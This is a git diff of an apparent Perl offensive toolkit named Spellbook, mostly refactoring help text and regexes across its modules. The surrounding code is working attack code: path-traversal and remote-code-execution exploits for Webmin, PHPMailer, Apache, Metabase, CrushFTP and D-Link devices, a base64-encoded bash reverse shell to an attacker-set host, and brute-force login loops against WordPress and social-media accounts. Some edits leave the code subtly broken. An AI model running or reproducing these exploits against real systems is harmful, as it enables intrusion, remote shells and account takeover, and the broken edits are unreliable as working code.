lib/Spellbook/Bruteforce/{Linkedin.pm => LinkedIn.pm} (68%) diff --git a/lib/Spellbook/Advisory/CVE_2006_3392.pm b/lib/Spellbook/Advisory/CVE_2006_3392.pm index 211e06a..90f5e12 100644 --- a/lib/Spellbook/Advisory/CVE_2006_3392.pm +++ b/lib/Spellbook/Advisory/CVE_2006_3392.pm @@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2006_3392 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $file); @@ -15,24 +15,27 @@ package Spellbook::Advisory::CVE_2006_3392 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $temp = "/..%01" x 40; my $request = $userAgent -> get($target . "/unauthenticated/" . $temp . $file); - - return $request -> content(); - } + + return $request -> content(); + } if ($help) { - return " - \rExploit::CVE_2006_3392 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-f, --file Define a file to read\n\n"; + return <<"EOT"; + +Exploit::CVE_2006_3392 +======================= +-h, --help See this menu +-t, --target Define a target +-f, --file Define a file to read + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2016_10045.pm b/lib/Spellbook/Advisory/CVE_2016_10045.pm index 6c7a61f..a53742f 100644 --- a/lib/Spellbook/Advisory/CVE_2016_10045.pm +++ b/lib/Spellbook/Advisory/CVE_2016_10045.pm @@ -7,7 +7,7 @@ package Spellbook::Advisory::CVE_2016_10045 { sub new { my ($self, $parameters) = @_; my ($help, $target, @results); - + my $dir = "/var/www/html/uploads"; my %shell = ( "name" => "spellbook_xpl.php", @@ -21,9 +21,9 @@ package Spellbook::Advisory::CVE_2016_10045 { "S|shell=s" => \$shell{name}, "d|directory=s" => \$dir ); - + if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -34,10 +34,10 @@ package Spellbook::Advisory::CVE_2016_10045 { $shell{code} = $code -> slurp(); } - + my $CVE_2016_10033 = "\"attacker\\\" -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; my $CVE_2016_10045 = "\"attacker\\' -oQ/tmp/ -X$dir/$shell{name} some\"\@email.com"; - + try { my $request = $userAgent -> post($target, [ "action" => "send", @@ -62,13 +62,16 @@ package Spellbook::Advisory::CVE_2016_10045 { } if ($help) { - return " - \rExploit::CVE_2016_10045 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-S, --shell - \r-d, --directory \n\n"; + return<<"EOT"; + +Exploit::CVE_2016_10045 +======================= +-h, --help See this menu +-t, --target Define a target +-S, --shell +-d, --directory \n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2017_5487.pm b/lib/Spellbook/Advisory/CVE_2017_5487.pm index c10b3eb..4d2f6f3 100755 --- a/lib/Spellbook/Advisory/CVE_2017_5487.pm +++ b/lib/Spellbook/Advisory/CVE_2017_5487.pm @@ -15,11 +15,11 @@ package Spellbook::Advisory::CVE_2017_5487 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my $request = $userAgent -> get("$target/wp-json/wp/v2/users"); @@ -29,11 +29,11 @@ package Spellbook::Advisory::CVE_2017_5487 { foreach my $data (@$content) { my $username = $data -> {slug}; - + if ($username) { push @result, $username; } - } + } }; return @result; @@ -42,14 +42,17 @@ package Spellbook::Advisory::CVE_2017_5487 { } if ($help) { - return " - \rExploit::CVE_2017_5487 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::CVE_2017_5487 +======================= +-h, --help See this menu +r-t, --target Define a target\n\n"; + +EOT } - return 0; + return 0; } } diff --git a/lib/Spellbook/Advisory/CVE_2020_9376.pm b/lib/Spellbook/Advisory/CVE_2020_9376.pm index 2eb317d..a07175f 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9376.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9376.pm @@ -3,7 +3,7 @@ package Spellbook::Advisory::CVE_2020_9376 { use warnings; use Mojo::DOM; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -15,7 +15,7 @@ package Spellbook::Advisory::CVE_2020_9376 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } @@ -38,11 +38,14 @@ package Spellbook::Advisory::CVE_2020_9376 { } if ($help) { - return " - \rAdvisory::CVE_2020_9376 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target to exploit\n\n"; + return<<"EOT"; + +Advisory::CVE_2020_9376 +======================= +-h, --help See this menu +-t, --target Define a target to exploit\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2020_9377.pm b/lib/Spellbook/Advisory/CVE_2020_9377.pm index 5cac0b5..d5349b8 100644 --- a/lib/Spellbook/Advisory/CVE_2020_9377.pm +++ b/lib/Spellbook/Advisory/CVE_2020_9377.pm @@ -2,7 +2,7 @@ package Spellbook::Advisory::CVE_2020_9377 { use strict; use warnings; use Spellbook::Core::UserAgent; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $cookie, $command, @results); @@ -16,13 +16,13 @@ package Spellbook::Advisory::CVE_2020_9377 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); my $payload = "cmd=$command"; - + my $headers = HTTP::Headers -> new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=$cookie" @@ -39,13 +39,16 @@ package Spellbook::Advisory::CVE_2020_9377 { } if ($help) { - return " - \rAdvisory::CVE_2020_9377 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-c, --cookie Define a session cookie - \r-p, --payload Set the command to run on the target\n\n"; + return<<"EOT"; + +Advisory::CVE_2020_9377 +======================= +-h, --help See this menu +-t, --target Define a target +-c, --cookie Define a session cookie +-p, --payload Set the command to run on the target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_24891.pm b/lib/Spellbook/Advisory/CVE_2021_24891.pm index ee0d49f..f3197ea 100644 --- a/lib/Spellbook/Advisory/CVE_2021_24891.pm +++ b/lib/Spellbook/Advisory/CVE_2021_24891.pm @@ -14,7 +14,7 @@ package Spellbook::Advisory::CVE_2021_24891 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } @@ -44,11 +44,14 @@ package Spellbook::Advisory::CVE_2021_24891 { } if ($help) { - return " - \rAdvisory::CVE_2021_24891 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Advisory::CVE_2021_24891 +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2021_41773.pm b/lib/Spellbook/Advisory/CVE_2021_41773.pm index 3bbae0d..1fe890a 100644 --- a/lib/Spellbook/Advisory/CVE_2021_41773.pm +++ b/lib/Spellbook/Advisory/CVE_2021_41773.pm @@ -16,10 +16,10 @@ package Spellbook::Advisory::CVE_2021_41773 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + if (!$file) { $file = "/etc/passwd"; } my $payload = "/cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/"; @@ -34,7 +34,7 @@ package Spellbook::Advisory::CVE_2021_41773 { my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get( - "https://" . $target . $payload, + "https://" . $target . $payload, Content => $command || " " ); @@ -44,13 +44,16 @@ package Spellbook::Advisory::CVE_2021_41773 { } if ($help) { - return " - \rExploit::CVE_2021_41773 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-f, --file Define a file to read - \r-c, --command Arbitrary code execution\n\n"; + return<<"EOT"; + +Exploit::CVE_2021_41773 +======================= +-h, --help See this menu +-t, --target Define a target +-f, --file Define a file to read +-c, --command Arbitrary code execution\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2023_29489.pm b/lib/Spellbook/Advisory/CVE_2023_29489.pm index 8f69a94..59e4b58 100644 --- a/lib/Spellbook/Advisory/CVE_2023_29489.pm +++ b/lib/Spellbook/Advisory/CVE_2023_29489.pm @@ -13,11 +13,11 @@ package Spellbook::Advisory::CVE_2023_29489 { "t|target=s" => \$target ); - if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $userAgent = Spellbook::Core::UserAgent -> new(); my @payloads = ( @@ -39,14 +39,17 @@ package Spellbook::Advisory::CVE_2023_29489 { } if ($help) { - return " - \rExploit::CVE_2023_29489 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::CVE_2023_29489 +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } - return 0; + return 0; } } diff --git a/lib/Spellbook/Advisory/CVE_2023_38646.pm b/lib/Spellbook/Advisory/CVE_2023_38646.pm index 2660ce3..966b399 100644 --- a/lib/Spellbook/Advisory/CVE_2023_38646.pm +++ b/lib/Spellbook/Advisory/CVE_2023_38646.pm @@ -23,23 +23,23 @@ package Spellbook::Advisory::CVE_2023_38646 { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } my $userAgent = Spellbook::Core::UserAgent -> new(); - my $request = $userAgent -> get("$target/api/session/properties"); + my $initial_request = $userAgent -> get("$target/api/session/properties"); - if ($request -> code() == 200) { + if ($initial_request -> code() == 200) { try { - my $content = decode_json($request -> content); + my $content = decode_json($initial_request -> content); my $token = $content -> {"setup-token"}; if ($token) { my $headers = HTTP::Headers -> new ("Content-Type" => "application/json"); my $reverse = encode_base64("bash -i >& /dev/tcp/$remote/$port 0>&1", ""); - my $payload = qq({ + my $payload = { "token": "$token", "details": { "is_on_demand": false, @@ -57,10 +57,12 @@ package Spellbook::Advisory::CVE_2023_38646 { "name": "an-sec-research-team", "engine": "h2" } - }); + }; - my $request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); - my $response = $userAgent -> request($request); + my $json_payload = encode_json($payload); + + my $exploit_request = HTTP::Request -> new("POST", "$target/api/setup/validate", $headers, $payload); + my $response = $userAgent -> request($exploit_request); if ($response -> code() == 400) { push @result, "\n[+] $target exploited\n"; @@ -73,13 +75,16 @@ package Spellbook::Advisory::CVE_2023_38646 { } if ($help) { - return " - \rExploit::CVE_2023_38646 - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target - \r-r, --remote Set the address to receive the reverse shell - \r-p, --port Set the port of reverse shell\n\n"; + return<<"EOT"; + +Exploit::CVE_2023_38646 +======================= +-h, --help See this menu +-t, --target Define a target +-r, --remote Set the address to receive the reverse shell +-p, --port Set the port of reverse shell\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/CVE_2024_4040.pm b/lib/Spellbook/Advisory/CVE_2024_4040.pm index 336f0e4..c162fe7 100644 --- a/lib/Spellbook/Advisory/CVE_2024_4040.pm +++ b/lib/Spellbook/Advisory/CVE_2024_4040.pm @@ -17,18 +17,18 @@ package Spellbook::Advisory::CVE_2024_4040 { "payload=s" => \$payload, "help" => \$help ); - + if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $endpoint = "$target/WebInterface/"; my $userAgent = Spellbook::Core::UserAgent -> new(); my $cookie_jar = HTTP::Cookies -> new(); - + $userAgent -> cookie_jar($cookie_jar); - + my $response = $userAgent -> post($endpoint); $cookie_jar -> extract_cookies($response); @@ -36,12 +36,12 @@ package Spellbook::Advisory::CVE_2024_4040 { my $cookies = $response -> header("Set-Cookie"); - if ($cookies =~ /currentAuth=([^;]+)/x) { - $response = $userAgent -> post($endpoint, - Content_Type => "application/x-www-form-urlencoded", + if ($cookies =~ /currentAuth=([^;]+)/x) { + $response = $userAgent -> post($endpoint, + Content_Type => "application/x-www-form-urlencoded", Content => "command=exists&paths=$payload&c2f=$1" ); - + push @result, $response -> decoded_content(); } @@ -49,12 +49,15 @@ package Spellbook::Advisory::CVE_2024_4040 { } if ($help) { - return " - \rAdvisory::CVE_2024_4040 - \r======================================== - \r-h, --help See this menu - \r-u, --target Define the targeted CrushFTP server URL - \r-p, --payload Set the payload to run on the target\n\n"; + return<<"EOT"; + +Advisory::CVE_2024_4040 +======================================== +-h, --help See this menu +-u, --target Define the targeted CrushFTP server URL +-p, --payload Set the payload to run on the target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm index 489c545..5d29c85 100644 --- a/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm +++ b/lib/Spellbook/Advisory/Laravel_Ignition_XSS.pm @@ -15,10 +15,10 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my @uuid = Spellbook::Helper::Generate_UUID -> new(["--version" => 4, "--repeat" => 1]); my $payload = "$target/_ignition/scripts/--%3E%3Csvg%20onload=alert%28$uuid[0]%29%3E"; my $userAgent = Spellbook::Core::UserAgent -> new(); @@ -31,16 +31,19 @@ package Spellbook::Advisory::Laravel_Ignition_XSS { ) { push @results, $target; } - + return @results; } if ($help) { - return " - \rAdvisory::CVE_ - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Advisory::CVE_ +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Android/APKSign.pm b/lib/Spellbook/Android/APKSign.pm index 58745de..7250745 100755 --- a/lib/Spellbook/Android/APKSign.pm +++ b/lib/Spellbook/Android/APKSign.pm @@ -21,15 +21,18 @@ package Spellbook::Android::APKSign { } if ($help) { - return " - \rAndroid::APKSign - \r================ - \r-h, --help See this menu - \r-a, --apk Pass the APK file - \r-n, --name Set de package name - \r-p, --password Define a password\n"; + return<<"EOT"; + +Android::APKSign +================ +-h, --help See this menu +-a, --apk Pass the APK file +-n, --name Set de package name +-p, --password Define a password\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Android/Manifest.pm b/lib/Spellbook/Android/Manifest.pm index 065953f..57fc37f 100755 --- a/lib/Spellbook/Android/Manifest.pm +++ b/lib/Spellbook/Android/Manifest.pm @@ -27,21 +27,27 @@ package Spellbook::Android::Manifest { # Exported Android Components # Access to protected intents via exported Activities # Access to sensitive data via exported Activity - - return " - \r[ - ] -> Package name: $package - \r[ - ] -> Debug: $debug - \r[ - ] -> Backup: $backup\n\n"; + + return join("\n", + "[ - ] -> Package name: $package", + "[ - ] -> Debug: $debug", + "[ - ] -> Backup: $backup", + "", + "" + ); } if ($help) { - return " - \rAndroid::Manifest - \r============== - \r-h, --help See this menu - \r-f, --file Pass the AndroidManifest.xml file\n\n"; + return<<"EOT"; + +Android::Manifest +============== +-h, --help See this menu +-f, --file Pass the AndroidManifest.xml file\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Android/Strings.pm b/lib/Spellbook/Android/Strings.pm index 3bb0b51..79cf20d 100755 --- a/lib/Spellbook/Android/Strings.pm +++ b/lib/Spellbook/Android/Strings.pm @@ -12,17 +12,20 @@ package Spellbook::Android::Strings { # resources.arsc/strings.xml # res/xml/file_paths.xml - + # if (Dumper($data) =~ m/:\/\//) { # return "true"; # } } if ($help) { - return " - \rAndroid:: - \r================ - \r-h, --help See this menu\n"; + return<<"EOT"; + +Android:: +================ +-h, --help See this menu\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Bruteforce/Facebook.pm b/lib/Spellbook/Bruteforce/Facebook.pm index 7f291ef..004034b 100644 --- a/lib/Spellbook/Bruteforce/Facebook.pm +++ b/lib/Spellbook/Bruteforce/Facebook.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Facebook { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::Facebook { } if ($help) { - return " - \rBruteforce::Facebook - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::Facebook +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/Instagram.pm b/lib/Spellbook/Bruteforce/Instagram.pm index d1d5022..7f99fe3 100644 --- a/lib/Spellbook/Bruteforce/Instagram.pm +++ b/lib/Spellbook/Bruteforce/Instagram.pm @@ -18,15 +18,18 @@ package Spellbook::Bruteforce::Instagram { if ($username) { my $useragent = LWP::UserAgent -> new(); - } + } if ($help) { - return " - \rExploit::Brute_Force_Instagram - \r======================= - \r-h, --help See this menu - \r-u, --username Define a username - \r-f, --file Define a file to read\n\n"; + return<<"EOT"; + +Exploit::Brute_Force_Instagram +======================= +-h, --help See this menu +-u, --username Define a username +-f, --file Define a file to read\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Bruteforce/Linkedin.pm b/lib/Spellbook/Bruteforce/LinkedIn.pm similarity index 68% rename from lib/Spellbook/Bruteforce/Linkedin.pm rename to lib/Spellbook/Bruteforce/LinkedIn.pm index d59352d..8b6a8e7 100644 --- a/lib/Spellbook/Bruteforce/Linkedin.pm +++ b/lib/Spellbook/Bruteforce/LinkedIn.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::LinkedIn { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::LinkedIn { } if ($help) { - return " - \rBruteforce::LinkedIn - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::LinkedIn +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/SMTP.pm b/lib/Spellbook/Bruteforce/SMTP.pm index 727b096..d976736 100644 --- a/lib/Spellbook/Bruteforce/SMTP.pm +++ b/lib/Spellbook/Bruteforce/SMTP.pm @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::SMTP { } if ($help) { - return " - \rBruteforce::SMTP - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::SMTP +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/Twitter.pm b/lib/Spellbook/Bruteforce/Twitter.pm index d094ea4..cd1b3ed 100644 --- a/lib/Spellbook/Bruteforce/Twitter.pm +++ b/lib/Spellbook/Bruteforce/Twitter.pm @@ -1,7 +1,7 @@ package Spellbook::Bruteforce::Twitter { use strict; use warnings; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @result); @@ -18,11 +18,14 @@ package Spellbook::Bruteforce::Twitter { } if ($help) { - return " - \rBruteforce::Twitter - \r===================== - \r-h, --help See this menu - \r-t, --target \n\n"; + return<<"EOT"; + +Bruteforce::Twitter +===================== +-h, --help See this menu +-t, --target \n\n"; + +EOT } } } diff --git a/lib/Spellbook/Bruteforce/Wordpress.pm b/lib/Spellbook/Bruteforce/Wordpress.pm index b204b07..f19689e 100644 --- a/lib/Spellbook/Bruteforce/Wordpress.pm +++ b/lib/Spellbook/Bruteforce/Wordpress.pm @@ -3,6 +3,7 @@ package Spellbook::Bruteforce::Wordpress { use warnings; use LWP::UserAgent; use HTTP::Request::Common; + use Carp qw(croak); # THIS IS A DRAFT MODULE @@ -18,28 +19,32 @@ package Spellbook::Bruteforce::Wordpress { ); if ($target) { - open(my $wordlist, "<", "./files/rockyou.txt"); + open(my $wordlist, "<", "./files/rockyou.txt") + or croak "Could not open wordlist file: $!"; + my @passwords = <$wordlist>; + close($wordlist) or croak "Could not close wordlist file: $!"; - while (<$wordlist>) { - chomp ($_); + chomp(@passwords); + foreach my $password (@passwords) { my $useragent = LWP::UserAgent->new; my $response = $useragent -> request(POST $target, [ log => $username, - pwd => $_, + pwd => $password, ]); if ($response -> is_success) { - print "Successfully logged in with password: $_ \n"; + print "Successfully logged in with password: $password \n"; + last; } } - - close($wordlist); } if ($help) { - return ""; + return<<"EOT"; + +EOT } return 0; diff --git a/lib/Spellbook/Core/Credentials.pm b/lib/Spellbook/Core/Credentials.pm index f12d6e8..309d19f 100644 --- a/lib/Spellbook/Core/Credentials.pm +++ b/lib/Spellbook/Core/Credentials.pm @@ -15,14 +15,14 @@ package Spellbook::Core::Credentials { "p|platform=s" => \$platform, "v|value=s" => \$value, ); - + if ($platform) { my $credentials = Mojo::File -> new(".config/credentials.json"); my $data = $credentials -> slurp(); my $content = decode_json($data); - if ($value) { + if ($value) { $content -> {$platform} = $value; $credentials -> spurt(encode_json($content)); } @@ -31,14 +31,17 @@ package Spellbook::Core::Credentials { } if ($help) { - return " - \rCore::Credentials - \r============== - \r-h, --help See this menu - \r-p, --platform Read some credentials filtering by platform - \r-v, --value Define a value of a platform\n\n"; + return<<"EOT"; + +Core::Credentials +============== +-h, --help See this menu +-p, --platform Read some credentials filtering by platform +-v, --value Define a value of a platform\n\n"; + +EOT } - + return 0; } } diff --git a/lib/Spellbook/Core/Helper.pm b/lib/Spellbook/Core/Helper.pm index f50f568..e77fe88 100644 --- a/lib/Spellbook/Core/Helper.pm +++ b/lib/Spellbook/Core/Helper.pm @@ -3,17 +3,18 @@ package Spellbook::Core::Helper { use warnings; sub new { - print " - \rSpellbook v0.3.6 - \rCore Commands - \r============== - \r\tCommand Description - \r\t------- ----------- - \r\t-s, --search List modules, you can filter by category - \r\t-m, --module Define a module to use - \r\t-h, --help To see help menu of a module\n\n"; - - return 1; + return<<"EOT"; + +Spellbook v0.3.6 +Core Commands +============== +Command Description +------- ----------- +-s, --search List modules, you can filter by category +-m, --module Define a module to use +-h, --help To see help menu of a module\n\n"; + +EOT } } diff --git a/lib/Spellbook/Core/Module.pm b/lib/Spellbook/Core/Module.pm index cb54b7e..82b3a7f 100644 --- a/lib/Spellbook/Core/Module.pm +++ b/lib/Spellbook/Core/Module.pm @@ -2,20 +2,31 @@ package Spellbook::Core::Module { use strict; use warnings; use Spellbook::Core::Resources; + use Carp qw(croak); sub new { my ($self, $module, @parameters) = @_; - my $resources = Spellbook::Core::Resources -> new(); + my $resources = Spellbook::Core::Resources->new(); - foreach my $package (@{$resources -> {modules}}) { - my $category = ucfirst $package -> {category}; - my $name = $category . "::" . $package -> {module}; + foreach my $package (@{$resources->{modules}}) { + my $category = ucfirst $package->{category}; + my $name = $category . "::" . $package->{module}; - if ($name eq $module) { - require "Spellbook/" . $category . "/" . $package -> {module} . ".pm"; + if ($name eq $module) { + my $module_path = "Spellbook::" . $category . "::" . $package->{module}; - my @run = "Spellbook::$name" -> new(@parameters); + my $success = eval { + require Module::Load; + Module::Load::load($module_path); + 1; + }; + + if (!$success || $@) { + croak "Failed to load module $module_path: $@"; + } + + my @run = $module_path->new(@parameters); my @results; foreach my $result (@run) { @@ -27,7 +38,7 @@ package Spellbook::Core::Module { return @results; } } - + return "\n[!] Module not found.\n\n"; } } diff --git a/lib/Spellbook/Core/Orchestrator.pm b/lib/Spellbook/Core/Orchestrator.pm index b4a8a63..0c1c112 100644 --- a/lib/Spellbook/Core/Orchestrator.pm +++ b/lib/Spellbook/Core/Orchestrator.pm @@ -7,13 +7,13 @@ package Spellbook::Core::Orchestrator { use threads::shared; use Spellbook::Helper::Read_File; use List::MoreUtils qw(uniq); - + sub new { my ($self, $parameters) = @_; my ($help, $wordlist, $module, $list, $queue); my $threads = 10; - + Getopt::Long::GetOptionsFromArray ( $parameters, "h|help" => \$help, @@ -34,24 +34,24 @@ package Spellbook::Core::Orchestrator { $queue -> end(); my @results :shared; - + async { while (defined(my $target = $queue -> dequeue())) { my @response = Spellbook::Core::Module -> new ( $module, [ "--target" => $target, @$parameters ] ); - + lock(@results); - + if (@response) { push @results, @response; } } - } - + } + for 1 .. $threads; - while (threads -> list(threads::running) > 0) { + while (threads -> list(threads::running) > 0) { $_ -> join() for threads -> list(threads::all); } @@ -59,13 +59,16 @@ package Spellbook::Core::Orchestrator { } if ($help) { - return " - \rCore::Orchestrator - \r============== - \r\t-h, --help See this menu - \r\t-t, --threads Number of threads - \r\t-w, --wordlist Wordlist file - \r\t-e, --entrypoint Module to execute\n\n"; + return<<"EOT"; + +Core::Orchestrator +============== +-h, --help See this menu +-t, --threads Number of threads +-w, --wordlist Wordlist file +-e, --entrypoint Module to execute\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/CORS_Misconfig.pm b/lib/Spellbook/Exploit/CORS_Misconfig.pm index 72fb36c..7dd342c 100644 --- a/lib/Spellbook/Exploit/CORS_Misconfig.pm +++ b/lib/Spellbook/Exploit/CORS_Misconfig.pm @@ -14,17 +14,17 @@ package Spellbook::Exploit::CORS_Misconfig { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "https://$target"; } - + my $useragent = Spellbook::Core::UserAgent -> new (); my @payloads = ("*", "null", "https://spellbook.xpl", "$target.spellbook.xpl"); # "test.$target", "http://" foreach my $payload (@payloads) { my $request = $useragent -> get($target, "Origin" => $payload); my $header = $request -> header("access-control-allow-origin"); - + if ($header) { if ($header eq $payload) { push @results, $target; @@ -36,11 +36,14 @@ package Spellbook::Exploit::CORS_Misconfig { } if ($help) { - return " - \rExploit::CORS_Misconfing - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::CORS_Misconfing +======================= +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/DataBreach.pm b/lib/Spellbook/Exploit/DataBreach.pm index c500fad..e68d700 100644 --- a/lib/Spellbook/Exploit/DataBreach.pm +++ b/lib/Spellbook/Exploit/DataBreach.pm @@ -4,7 +4,7 @@ package Spellbook::Exploit::DataBreach { use JSON; use Spellbook::Core::UserAgent; use Spellbook::Core::Credentials; - + sub new { my ($self, $parameters) = @_; my ($help, $target, @results); @@ -20,7 +20,7 @@ package Spellbook::Exploit::DataBreach { my $endpoint = "https://haveibeenpwned.com/api/v3/breachedaccount/$target?includeUnverified=true&truncateResponse=false"; my $useragent = Spellbook::Core::UserAgent -> new(); my $request = $useragent -> get($endpoint, "hibp-api-key" => $credentials); - + if ($request -> code() == 200) { my $data = decode_json($request -> decoded_content()); @@ -36,11 +36,14 @@ package Spellbook::Exploit::DataBreach { } if ($help) { - return " - \rExploit::Databreach - \r============== - \r-h, --help See this menu - \r-t, --target Define a target\n\n"; + return<<"EOT"; + +Exploit::Databreach +============== +-h, --help See this menu +-t, --target Define a target\n\n"; + +EOT } } } diff --git a/lib/Spellbook/Exploit/Django_DEBUG.pm b/lib/Spellbook/Exploit/Django_DEBUG.pm index 2949057..9102e89 100755 --- a/lib/Spellbook/Exploit/Django_DEBUG.pm +++ b/lib/Spellbook/Exploit/Django_DEBUG.pm @@ -1,4 +1,4 @@ -package Spellbook::Exploit::Django_Debug { +package Spellbook::Exploit::Django_DEBUG { use strict; use warnings; use Spellbook::Core::UserAgent; @@ -15,7 +15,7 @@ package Spellbook::Exploit::Django_Debug { ); if ($target){ - if ($target !~ /^http(s)?:\/\//){ + if ($target !~ /^http(?:s)?:\/\//x){ $target = "https://$target"; } @@ -32,16 +32,19 @@ package Spellbook::Exploit::Django_Debug { } } } - + return @results } if ($help) { - return " - \rExploit::Django_Debug - \r======================= - \r-h, --help See this menu - \r-t, --target Define a target"; + return<<"EOT"; + +Exploit::Django_Debug +======================= +-h, --help See this menu +-t, --target Define a target"; + +EOT } return 0; diff --git a/lib/Spellbook/Exploit/Fullchain_DLINK.pm b/lib/Spellbook/Exploit/Fullchain_DLINK.pm index e7d8540..f2d49a5 100644 --- a/lib/Spellbook/Exploit/Fullchain_DLINK.pm +++ b/lib/Spellbook/Exploit/Fullchain_DLINK.pm @@ -7,7 +7,7 @@ package Spellbook::Exploit::Fullchain_DLINK { use Spellbook::Recon::Query_Shodan; use Spellbook::Advisory::CVE_2020_9376; use Spellbook::Advisory::CVE_2020_9377; - + sub new { my ($self, $parameters) = @_; my ($help, $target, $payload, @results); @@ -20,23 +20,23 @@ package Spellbook::Exploit::Fullchain_DLINK { ); if ($target) { - if ($target !~ /^http(s)?:\/\//x) { + if ($target !~ /^http(?:s)?:\/\//x) { $target = "http://$target"; } my $credentials = Spellbook::Advisory::CVE_2020_9376 -> new (["--target" => $target]); if ($credentials) { - my ($username, $password) = split /:/, $credentials; + my ($username, $password) = split /:/x, $credentials; - if (!$password) { + if (!$password) { $password = "admin"; } if ($username) { my $userAgent = LWP::UserAgent->new(); - my $payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; - + my $login_payload = "REPORT_METHOD=xml&ACTION=login_plaintext&USER=$username&PASSWD=$password&CAPTCHA="; + my $headers = HTTP::Headers->new ( "Content-Type" => "application/x-www-form-urlencoded", "Cookie" => "uid=zwUEueUOvi", @@ -48,16 +48,16 @@ package 